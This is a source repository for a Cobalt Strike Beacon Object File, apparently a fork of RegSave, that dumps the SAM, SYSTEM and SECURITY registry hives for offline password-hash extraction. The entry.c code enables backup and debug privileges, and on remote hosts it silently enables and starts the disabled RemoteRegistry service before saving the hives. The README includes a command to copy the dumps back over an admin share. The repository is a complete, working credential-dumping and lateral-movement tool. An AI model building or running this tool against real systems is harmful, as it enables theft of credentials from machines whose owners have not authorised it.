├── Makefile
├── README.md
├── SOURCE
    ├── beacon.h
    ├── common.h
    ├── entry.c
    ├── entry_x64.o
    └── entry_x86.o
├── regdump.x64.o
├── regdump.x86.o
└── regsave.cna


/Makefile:
--------------------------------------------------------------------------------
 1 | #
 2 | # Beacon Object File ( BOF ) Compiler
 3 | # 
 4 | # Used to create object files that are
 5 | # compatible with Beacon's inline-execute
 6 | # command.
 7 | #
 8 | 
 9 | CC_x64 := x86_64-w64-mingw32-gcc
10 | LD_x64 := x86_64-w64-mingw32-ld
11 | STRx64 := x86_64-w64-mingw32-strip
12 | CC_x86 := i686-w64-mingw32-gcc
13 | LD_x86 := i686-w64-mingw32-ld
14 | STRx86 := i686-w64-mingw32-strip
15 | 
16 | SOURCE := $(wildcard source/*.c)
17 | OBJECT := $(SOURCE:%.c=%.o)
18 | CFLAGS := -Os -s -Qn -nostdlib 
19 | LFLAGS := -Wl,-s,--exclude-all-symbols
20 | 
21 | all: $(OBJECT)
22 | 	$(LD_x64) -x -r source/*_x64.o -o regdump.x64.o
23 | 	$(LD_x86) -x -r source/*_x86.o -o regdump.x86.o
24 | 
25 | .c.o:
26 | 	$(CC_x64) -o $(basename $@)_x64.o -c $< $(CFLAGS) $(LFLAGS)
27 | 	$(STRx64) -N $(basename $(notdir $@)).c $(basename $@)_x64.o
28 | 	$(CC_x86) -o $(basename $@)_x86.o -c $< $(CFLAGS) $(LFLAGS)
29 | 	$(STRx86) -N $(basename $(notdir $@)).c $(basename $@)_x86.o
30 | 
31 | clean:
32 | 	rm -rf source/*_x64.o
33 | 	rm -rf source/*_x86.o
34 | 	rm -rf regdump.x64.o regdump.x86.o
35 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # BOF - RemoteRegSave
 2 | 
 3 | A fork of [RegSave BOF](https://github.com/EncodeGroup/BOF-RegSave). Dump SAM/SYSTEM/SECURITY registry key hives on local or remote computer using `RegConnectRegistryA` and `RegOpenKeyExA` for offline parsing and hash extraction.
 4 | 
 5 | 
 6 | 
 7 | ### Usage
 8 | 
 9 | Dump registry key hives on local computer (admin elevation required)
10 | 
11 | ```
12 | RegSave --path [file path <optional>]
13 | ```
14 | 
15 | Dump registry key hives on remote computer (automatically enable service RemoteRegistry if disabled)
16 | 
17 | ```
18 | RegSave --pc remotePC --path [file path <optional>]
19 | shell copy \\remoteSrv\C$\Windows\temp\HG029* .
20 | ```
21 | 
22 | 
23 | 
24 | ### Compile
25 | 
26 | ```linux
27 | cd SOURCE
28 | make
29 | ```
30 | 
31 | 
32 | 
33 | ### References
34 | 
35 | + [RegSave BOF](https://github.com/EncodeGroup/BOF-RegSave)
36 | + [SharpSecDump](https://github.com/G0ldenGunSec/SharpSecDump)
37 | 


--------------------------------------------------------------------------------
/SOURCE/beacon.h:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * Beacon Object Files (BOF)
 3 |  * -------------------------
 4 |  * A Beacon Object File is a light-weight post exploitation tool that runs
 5 |  * with Beacon's inline-execute command.
 6 |  *
 7 |  * Cobalt Strike 4.1.
 8 |  */
 9 | 
10 | /* data API */
11 | typedef struct {
12 | 	char * original; /* the original buffer [so we can free it] */
13 | 	char * buffer;   /* current pointer into our buffer */
14 | 	int    length;   /* remaining length of data */
15 | 	int    size;     /* total size of this buffer */
16 | } datap;
17 | 
18 | DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
19 | DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
20 | DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
21 | DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
22 | DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
23 | 
24 | /* format API */
25 | typedef struct {
26 | 	char * original; /* the original buffer [so we can free it] */
27 | 	char * buffer;   /* current pointer into our buffer */
28 | 	int    length;   /* remaining length of data */
29 | 	int    size;     /* total size of this buffer */
30 | } formatp;
31 | 
32 | DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
33 | DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
34 | DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
35 | DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
36 | DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
37 | DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
38 | DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
39 | 
40 | /* Output Functions */
41 | #define CALLBACK_OUTPUT      0x0
42 | #define CALLBACK_OUTPUT_OEM  0x1e
43 | #define CALLBACK_ERROR       0x0d
44 | #define CALLBACK_OUTPUT_UTF8 0x20
45 | 
46 | DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
47 | DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
48 | 
49 | /* Token Functions */
50 | DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
51 | DECLSPEC_IMPORT void   BeaconRevertToken();
52 | DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
53 | 
54 | /* Spawn+Inject Functions */
55 | DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
56 | DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
57 | DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
58 | DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
59 | 
60 | /* Utility Functions */
61 | DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);
62 | 


--------------------------------------------------------------------------------
/SOURCE/common.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | #include <ntstatus.h>
 4 | #include <windows.h>
 5 | 
 6 | 
 7 | WINADVAPI LONG WINAPI ADVAPI32$RegConnectRegistryA(LPCSTR, HKEY, PHKEY);
 8 | WINADVAPI LONG WINAPI ADVAPI32$RegOpenKeyExA (HKEY, LPCSTR, DWORD, REGSAM, PHKEY);
 9 | WINADVAPI LONG WINAPI ADVAPI32$RegCloseKey(HKEY);
10 | WINADVAPI LONG WINAPI ADVAPI32$RegSaveKeyA (HKEY, LPCSTR, LPSECURITY_ATTRIBUTES);
11 | WINBASEAPI BOOL WINAPI ADVAPI32$OpenProcessToken (HANDLE, DWORD, PHANDLE);
12 | WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (void);
13 | WINBASEAPI BOOL WINAPI ADVAPI32$LookupPrivilegeValueA (LPCSTR, LPCSTR, PLUID);
14 | WINBASEAPI BOOL WINAPI ADVAPI32$AdjustTokenPrivileges(HANDLE, BOOL, PTOKEN_PRIVILEGES, DWORD, PTOKEN_PRIVILEGES, PDWORD);
15 | WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentProcess (void);
16 | WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle (HANDLE);
17 | WINBASEAPI LPSTR WINAPI SHLWAPI$PathCombineA(LPSTR,LPCSTR,LPCSTR);
18 | 
19 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$OpenSCManagerA(LPCSTR lpMachineName, LPCSTR lpDatabaseName, DWORD dwDesiredAccess);
20 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$OpenServiceA(SC_HANDLE hSCManager, LPCSTR lpServiceName, DWORD dwDesiredAccess);
21 | WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceStatusEx(SC_HANDLE hService, SC_STATUS_TYPE InfoLevel, LPBYTE lpBuffer, DWORD cbBufSize, LPDWORD pcbBytesNeeded);
22 | WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceConfigA(SC_HANDLE hService, LPQUERY_SERVICE_CONFIGA lpServiceConfig, DWORD cbBufSize, LPDWORD pcbBytesNeeded);
23 | WINADVAPI WINBOOL WINAPI ADVAPI32$ChangeServiceConfigA(SC_HANDLE hService, DWORD dwServiceType, DWORD dwStartType, DWORD dwErrorControl, LPCSTR lpBinaryPathName, LPCSTR lpLoadOrderGroup, LPDWORD lpdwTagId, LPCSTR lpDependencies, LPCSTR lpServiceStartName, LPCSTR lpPassword, LPCSTR lpDisplayName);
24 | WINADVAPI WINBOOL WINAPI ADVAPI32$StartServiceA(SC_HANDLE hService, DWORD dwNumServiceArgs, LPCSTR* lpServiceArgVectors);
25 | WINADVAPI WINBOOL WINAPI ADVAPI32$CloseServiceHandle(SC_HANDLE hSCObject);
26 | WINADVAPI WINBOOL WINAPI ADVAPI32$ControlService(SC_HANDLE hService, DWORD dwControl, LPSERVICE_STATUS lpServiceStatus);
27 | 
28 | WINBASEAPI void* WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
29 | WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();


--------------------------------------------------------------------------------
/SOURCE/entry.c:
--------------------------------------------------------------------------------
  1 | #include <windows.h>
  2 | #include "common.h"
  3 | #include "beacon.h"
  4 | #include <stdbool.h>
  5 | 
  6 | 
  7 | DECLSPEC_IMPORT SC_HANDLE WINAPI ADVAPI32$OpenSCManagerA(LPCSTR, LPCSTR, DWORD);
  8 | 
  9 | SC_HANDLE gscManager;
 10 | bool bRegSrvStop = false;
 11 | bool bRegSrvDisable = false;
 12 | bool localdump = false;
 13 | 
 14 | void EnableDebugPriv(LPCSTR priv)
 15 | {
 16 | 	HANDLE hToken;
 17 | 	LUID luid;
 18 | 	TOKEN_PRIVILEGES tp;
 19 | 
 20 | 
 21 | 	if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
 22 | 	{
 23 | 		BeaconPrintf(CALLBACK_ERROR, "OpenProcessToken failed, Error = %u", KERNEL32$GetLastError());
 24 | 		return;
 25 | 	}
 26 | 
 27 | 	if (ADVAPI32$LookupPrivilegeValueA(NULL, priv, &luid) == 0)
 28 | 	{
 29 | 		BeaconPrintf(CALLBACK_ERROR, "LookupPrivilegeValue() failed, Error = %u", KERNEL32$GetLastError());
 30 | 		KERNEL32$CloseHandle(hToken);
 31 | 		return;
 32 | 	}
 33 | 
 34 | 	tp.PrivilegeCount = 1;
 35 | 	tp.Privileges[0].Luid = luid;
 36 | 	tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
 37 | 
 38 | 	if (!ADVAPI32$AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
 39 | 	{
 40 | 		BeaconPrintf(CALLBACK_ERROR, "AdjustTokenPrivileges() failed, Error = %u", KERNEL32$GetLastError());
 41 | 		return;
 42 | 	}
 43 | 
 44 | 	KERNEL32$CloseHandle(hToken);
 45 | }
 46 | 
 47 | 
 48 | 
 49 | bool StartRemoteRegSrv(char* hostname) {
 50 | 	SERVICE_STATUS_PROCESS serviceStatus;
 51 | 	DWORD junk = 0;
 52 | 	DWORD cbBytesNeeded = 0;
 53 | 	DWORD dwResult = ERROR_SUCCESS;
 54 | 	LPQUERY_SERVICE_CONFIGA lpServiceConfig = NULL;
 55 | 	SC_HANDLE scService = NULL;
 56 | 
 57 | 
 58 | 	if ((gscManager = ADVAPI32$OpenSCManagerA(hostname, SERVICES_ACTIVE_DATABASEA, SC_MANAGER_CONNECT | GENERIC_READ)) == NULL) {
 59 | 		BeaconPrintf(CALLBACK_ERROR, "OpenSCManagerA() failed, Error = %u", KERNEL32$GetLastError());
 60 | 		return false;
 61 | 	}
 62 | 	
 63 | 	if ((scService = ADVAPI32$OpenServiceA(gscManager, "RemoteRegistry", SERVICE_QUERY_STATUS | SERVICE_QUERY_CONFIG | SERVICE_CHANGE_CONFIG | SERVICE_START | SERVICE_STOP)) == NULL)
 64 | 	{
 65 | 		BeaconPrintf(CALLBACK_ERROR, "OpenServiceA() failed, Error = %u", KERNEL32$GetLastError());
 66 | 		return false;
 67 | 	}
 68 | 	
 69 | 	if (!ADVAPI32$QueryServiceStatusEx(scService, SC_STATUS_PROCESS_INFO, (LPBYTE)&serviceStatus, sizeof(SERVICE_STATUS_PROCESS), &junk))
 70 | 	{
 71 | 		BeaconPrintf(CALLBACK_ERROR, "QueryServiceStatusEx() failed, Error = %u", KERNEL32$GetLastError());
 72 | 		return false;
 73 | 	}
 74 | 
 75 | 	if (serviceStatus.dwCurrentState == SERVICE_STOPPED) {
 76 | 		BeaconPrintf(CALLBACK_OUTPUT, "[!] RemoteRegistry service state: stopped");
 77 | 		ADVAPI32$QueryServiceConfigA(scService, NULL, 0, &cbBytesNeeded);
 78 | 		dwResult = KERNEL32$GetLastError();
 79 | 
 80 | 		if (dwResult != ERROR_INSUFFICIENT_BUFFER) {
 81 | 			BeaconPrintf(CALLBACK_ERROR, "QueryServiceConfigA() failed, INSUFFICIENT_BUFFER, Error = %u\n", dwResult);
 82 | 			return false;
 83 | 		}
 84 | 		if ((lpServiceConfig = (LPQUERY_SERVICE_CONFIGA)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, cbBytesNeeded)) == NULL)
 85 | 		{
 86 | 			BeaconPrintf(CALLBACK_ERROR, "HeapAlloc() failed");
 87 | 			return false;
 88 | 		}
 89 | 		if (!ADVAPI32$QueryServiceConfigA(scService, lpServiceConfig, cbBytesNeeded, &cbBytesNeeded))
 90 | 		{
 91 | 			BeaconPrintf(CALLBACK_ERROR, "QueryServiceConfigA() failed, Error = %u", KERNEL32$GetLastError());
 92 | 			return false;
 93 | 		}
 94 | 
 95 | 
 96 | 		if (lpServiceConfig->dwStartType == SERVICE_DISABLED) {
 97 | 			BeaconPrintf(CALLBACK_OUTPUT, "[!] RemoteRegistry service type: disabled");
 98 | 
 99 | 			if (ADVAPI32$ChangeServiceConfigA(scService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, SERVICE_NO_CHANGE, NULL, NULL, NULL, NULL, NULL, NULL, NULL)) {
100 | 				BeaconPrintf(CALLBACK_OUTPUT, "Successfully enable RemoteRegistry service");
101 | 				bRegSrvDisable = true;
102 | 			}
103 | 			else {
104 | 				BeaconPrintf(CALLBACK_ERROR, "ChangeServiceConfigA() failed, Error = %u", KERNEL32$GetLastError());
105 | 				return false;
106 | 			}
107 | 		}
108 | 		if (ADVAPI32$StartServiceA(scService, 0, NULL)) {
109 | 			BeaconPrintf(CALLBACK_OUTPUT, "Successfully started RemoteRegistry service");
110 | 			bRegSrvStop = true;
111 | 		}
112 | 		else {
113 | 			BeaconPrintf(CALLBACK_ERROR, "Failed to start RemoteRegistry service, Error = %u", KERNEL32$GetLastError());
114 | 			return false;
115 | 		}
116 | 		ADVAPI32$CloseServiceHandle(scService);
117 | 		scService = NULL;
118 | 
119 | 	}
120 | 	
121 | 
122 | 	return true;
123 | }
124 | 
125 | 
126 | 
127 | void StopRemoteRegSrv() {
128 | 	SC_HANDLE scService = NULL;
129 | 
130 | 	if ((scService = ADVAPI32$OpenServiceA(gscManager, "RemoteRegistry", SERVICE_QUERY_STATUS | SERVICE_QUERY_CONFIG | SERVICE_CHANGE_CONFIG | SERVICE_START | SERVICE_STOP)) == NULL)
131 | 	{
132 | 		BeaconPrintf(CALLBACK_ERROR, "OpenServiceA() failed, Error = %u", KERNEL32$GetLastError());
133 | 		return;
134 | 	}
135 | 
136 | 	SERVICE_STATUS_PROCESS sStatus;
137 | 	if (bRegSrvDisable) {
138 | 		if (ADVAPI32$ChangeServiceConfigA(scService, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE, NULL, NULL, NULL, NULL, NULL, NULL, NULL)) {
139 | 			BeaconPrintf(CALLBACK_OUTPUT, "Successfully disabled RemoteRegistry service");
140 | 		}
141 | 		else {
142 | 			BeaconPrintf(CALLBACK_ERROR, "ChangeServiceConfigA() failed, Error = %u", KERNEL32$GetLastError());
143 | 			return;
144 | 		}
145 | 	}
146 | 	if (bRegSrvStop) {
147 | 		if (ADVAPI32$ControlService(scService, SERVICE_CONTROL_STOP, (LPSERVICE_STATUS)&sStatus)) {
148 | 			BeaconPrintf(CALLBACK_OUTPUT, "Successfully stopped RemoteRegistry service");
149 | 		}
150 | 		else {
151 | 			BeaconPrintf(CALLBACK_ERROR, "ControlService() failed, Error = %u", KERNEL32$GetLastError());
152 | 			return;
153 | 		}
154 | 	}
155 | 	ADVAPI32$CloseServiceHandle(scService);
156 | 	scService = NULL;
157 | 
158 | 	return;
159 | }
160 | 
161 | void ExportRegKey(char* hostname, LPCSTR subkey, LPCSTR outFile)
162 | {
163 | 	HKEY hRemoteReg;
164 | 	HKEY hSubKey;
165 | 	LPSECURITY_ATTRIBUTES lpSecurityAttributes = NULL;
166 | 
167 | 	if (!localdump) {
168 | 		if (!ADVAPI32$RegConnectRegistryA(hostname, HKEY_LOCAL_MACHINE, &hRemoteReg) == ERROR_SUCCESS) {
169 | 			BeaconPrintf(CALLBACK_ERROR, "Could not connect remote reg key HKLM\\%s on %s, Error = %u", subkey, hostname, KERNEL32$GetLastError());
170 | 			return;
171 | 		}
172 | 		if (ADVAPI32$RegOpenKeyExA(hRemoteReg, subkey, 0, KEY_ALL_ACCESS, &hSubKey) != ERROR_SUCCESS)
173 | 		{
174 | 			BeaconPrintf(CALLBACK_ERROR, "Could not open key HKLM\\%s on %s, Error = %u", subkey, hostname, KERNEL32$GetLastError());
175 | 			return;
176 | 		}
177 | 	}
178 | 	else {
179 | 		if (ADVAPI32$RegOpenKeyExA(HKEY_LOCAL_MACHINE, subkey, REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_ALL_ACCESS, &hSubKey) != ERROR_SUCCESS)
180 | 		{
181 | 			BeaconPrintf(CALLBACK_ERROR, "Could not open key HKLM\\%s, Error = %u", subkey, KERNEL32$GetLastError());
182 | 			return;
183 | 		}
184 | 	}
185 | 
186 | 	if (ADVAPI32$RegSaveKeyA(hSubKey, outFile, lpSecurityAttributes) == ERROR_SUCCESS)
187 | 	{
188 | 		if (localdump) {
189 | 			BeaconPrintf(CALLBACK_OUTPUT, "Exported HKLM\\%s at %s", subkey, outFile);
190 | 		}
191 | 		else {
192 | 			BeaconPrintf(CALLBACK_OUTPUT, "Exported HKLM\\%s at %s on %s", subkey, outFile, hostname);
193 | 		}
194 | 	}
195 | 	else
196 | 	{
197 | 		BeaconPrintf(CALLBACK_ERROR, "RegSaveKey failed on HKLM\\%s, Error = %u", subkey, KERNEL32$GetLastError());
198 | 	}
199 | 
200 | 	ADVAPI32$RegCloseKey(hSubKey);
201 | 	
202 | }
203 | 
204 | void go(char* args, int alen)
205 | {
206 | 
207 | 	localdump = false;
208 | 	bRegSrvStop = false;
209 | 	bRegSrvDisable = false;
210 | 
211 | 	datap parser;
212 | 
213 | 	char buffer_1[MAX_PATH] = "";
214 | 	char* lpStr1;
215 | 	lpStr1 = buffer_1;
216 | 
217 | 	char buffer_sam[] = "HG029SAM.log";
218 | 	char* lpStrsam;
219 | 	lpStrsam = buffer_sam;
220 | 
221 | 	char buffer_sys[] = "HG029SYS.log";
222 | 	char* lpStrsys;
223 | 	lpStrsys = buffer_sys;
224 | 
225 | 	char buffer_sec[] = "HG029SEC.log";
226 | 	char* lpStrsec;
227 | 	lpStrsec = buffer_sec;
228 | 
229 | 
230 | 	BeaconDataParse(&parser, args, alen);
231 | 	char* dir = BeaconDataExtract(&parser, NULL);
232 | 	char* hostname = BeaconDataExtract(&parser, NULL);
233 | 	
234 | 	if (hostname[0] == '\0') {
235 | 		localdump = true;
236 | 	}
237 | 	if (dir[0] == '\0') {
238 | 		dir = "C:\\Windows\\Temp";
239 | 	}
240 | 
241 | 	if (localdump) {
242 | 		if (!BeaconIsAdmin()) {
243 | 			BeaconPrintf(CALLBACK_ERROR, "Local admin privileges required!");
244 | 			return;
245 | 		}
246 | 		EnableDebugPriv(SE_DEBUG_NAME);
247 | 		EnableDebugPriv(SE_RESTORE_NAME);
248 | 		EnableDebugPriv(SE_BACKUP_NAME);
249 | 	}
250 | 	else {
251 | 		if (!StartRemoteRegSrv(hostname)) {
252 | 			ADVAPI32$CloseServiceHandle(gscManager);
253 | 			gscManager = NULL;
254 | 			return;
255 | 		}
256 | 	}
257 | 
258 | 	SHLWAPI$PathCombineA(lpStr1, dir, lpStrsys);
259 | 	ExportRegKey(hostname, "SYSTEM", lpStr1);
260 | 
261 | 	SHLWAPI$PathCombineA(lpStr1, dir, lpStrsam);
262 | 	ExportRegKey(hostname, "SAM", lpStr1);
263 | 
264 | 	SHLWAPI$PathCombineA(lpStr1, dir, lpStrsec);
265 | 	ExportRegKey(hostname, "SECURITY", lpStr1);
266 | 	
267 | 	if (!localdump) {
268 | 		StopRemoteRegSrv();
269 | 		ADVAPI32$CloseServiceHandle(gscManager);
270 | 		gscManager = NULL;
271 | 	}
272 | 	
273 | };


--------------------------------------------------------------------------------
/SOURCE/entry_x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hagrid29/BOF-RemoteRegSave/6b0cd3baf3757e2ca0d6e5ecf7d86984d191957d/SOURCE/entry_x64.o


--------------------------------------------------------------------------------
/SOURCE/entry_x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hagrid29/BOF-RemoteRegSave/6b0cd3baf3757e2ca0d6e5ecf7d86984d191957d/SOURCE/entry_x86.o


--------------------------------------------------------------------------------
/regdump.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hagrid29/BOF-RemoteRegSave/6b0cd3baf3757e2ca0d6e5ecf7d86984d191957d/regdump.x64.o


--------------------------------------------------------------------------------
/regdump.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hagrid29/BOF-RemoteRegSave/6b0cd3baf3757e2ca0d6e5ecf7d86984d191957d/regdump.x86.o


--------------------------------------------------------------------------------
/regsave.cna:
--------------------------------------------------------------------------------
 1 | #RemoteRegSave Bof
 2 | #modified by Hagrid29
 3 | 
 4 | beacon_command_register("RegSave", "Dumps SAM / SECURITY / SYSTEM on remote computer", 
 5 | 	"RegSave --path [file path <optional>] --pc [remote pc <optional>]");
 6 | 
 7 | alias RegSave {
 8 | 	$bid = $1;
 9 | 	local('$args $dir $hostname');
10 | 	
11 | 	$hostname = "";
12 | 
13 | 	$input = substr($0, 8);
14 |     	@args = split(' ', $input);
15 | 
16 | 	for($i = 0; $i < size(@args); $i++){
17 | 		if(@args[$i] iswm "--pc"){
18 | 		    $i = $i + 1;
19 | 		    $hostname = @args[$i];
20 | 		}
21 | 		if(@args[$i] iswm "--path"){
22 | 		    $i = $i + 1;
23 | 		    $dir = @args[$i];
24 | 		}
25 |     	}
26 | 
27 | 
28 | 
29 | 	$barch  = barch($1);
30 | 	$handle = openf(script_resource("regdump. $+ $barch $+ .o"));
31 | 	$data   = readb($handle, -1);
32 | 	closef($handle);
33 | 
34 | 	$arg_data = bof_pack($bid, "zz", $dir, $hostname);
35 | 	beacon_inline_execute($bid, $data, "go", $arg_data);
36 | 
37 | }


--------------------------------------------------------------------------------